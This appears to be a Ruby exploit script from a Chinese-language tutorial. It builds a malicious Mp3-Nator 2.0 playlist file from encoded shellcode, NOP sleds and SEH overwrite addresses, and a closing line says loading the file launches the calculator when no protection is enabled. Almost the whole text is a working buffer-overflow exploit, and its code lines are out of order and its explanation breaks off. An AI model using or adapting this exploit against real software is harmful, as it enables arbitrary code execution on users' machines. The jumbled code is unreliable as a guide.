filename = 'exploit_no_dep_by_xiaot8267.plf' shellcode = "\x33\xc9\xb8\xd1\xa3\x3d\x27\xda\xdf\xd9\x74\x24\xf4\xb1"+ "\x32\x5a\x83\xc2\x04\x31\x42\x0c\x03\x93\xaf\xdf\xd2\xef"+ "\x58\x96\x1d\x0f\x99\xc9\x94\xea\xa8\xdb\xc3\x7f\x98\xeb"+ "\x80\x2d\x11\x87\xc5\xc5\xa2\xe5\xc1\xea\x03\x43\x34\xc5"+ "\x94\x65\xf8\x89\x57\xe7\x84\xd3\x8b\xc7\xb5\x1c\xde\x06"+ "\xf1\x40\x11\x5a\xaa\x0f\x80\x4b\xdf\x4d\x19\x6d\x0f\xda"+ "\x21\x15\x2a\x1c\xd5\xaf\x35\x4c\x46\xbb\x7e\x74\xec\xe3"+ "\x5e\x85\x21\xf0\xa3\xcc\x4e\xc3\x50\xcf\x86\x1d\x98\xfe"+ "\xe6\xf2\xa7\xcf\xea\x0b\xef\xf7\x14\x7e\x1b\x04\xa8\x79"+ "\xd8\x77\x76\x0f\xfd\xdf\xfd\xb7\x25\xde\xd2\x2e\xad\xec"+ "\x9f\x25\xe9\xf0\x1e\xe9\x81\x0c\xaa\x0c\x46\x85\xe8\x2a"+ "\x42\xce\xab\x53\xd3\xaa\x1a\x6b\x03\x12\xc2\xc9\x4f\xb0"+ "\x17\x6b\x12\xde\xe6\xf9\x28\xa7\xe9\x01\x33\x87\x81\x30"+ "\xb8\x48\xd5\xcc\x6b\x2d\x27\x3c\xa6\xbb\xb0\xe7\x53\x86"+ "\xdc\x17\x8e\xc4\xd8\x9b\x3b\xb4\x1e\x83\x49\xb1\x5b\x03"+ "\xa1\xcb\xf4\xe6\xc5\x78\xf4\x22\xa6\x1f\x66\xae\x29" nop1 = "\x90" * 28 jmp1 = [0x7E429353].pack('V') nop2 = "\x90"*(256-32) nop3 = "\x90"*(4108-479) nSEH = [0xFFFFFFFF].pack('V') SEH = [0x10019C35].pack('V') playload = nop1 + jmp1 + nop2+ shellcode + nop3 + nSEH + SEH fd.write playload end File.open(filename,'w') do |fd|
最后用 Mp3-Nator 2.0 加载构造的文件就会弹出计算器程序,当然这是在程序没有启用
|